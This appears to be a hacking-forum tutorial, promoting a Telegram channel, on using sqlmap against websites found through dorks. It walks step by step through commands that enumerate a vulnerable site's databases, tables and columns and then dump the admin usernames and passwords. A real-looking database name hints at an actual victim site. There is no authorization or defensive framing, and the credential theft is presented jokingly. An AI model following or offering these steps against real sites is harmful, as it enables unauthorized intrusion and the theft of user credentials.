You can use the SQLMAP tool available on Backtrack or Kali, Windows. This is one of the skills that anyone working in the security field must know.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
You can use some dorks to find a website with SQL errors,
Ex: we have a site like this http://www.xxxxxxxx.com/about.php?id=1
Now start SQL by typing (-h or –help) into the console
To view the database, use the following command:
Code:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 --dbs
-u = url path
–dbs = List databases
According to the picture above, we can see ” unecuae_unec ” what is this, I don’t need to say more
Now we continue with the command:
Code:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec --tables
-D = DBMS list data
–tables = list what you need to find out for yourself….
After finding some “periodic table”, we continue to use the command to show the goods
Code:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user --columns
-T = DBMS command to list data
–columns = list what you need to find out for yourself….
At this point, you can see the admin’s underwear.)
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user -C user_username,user_password --dump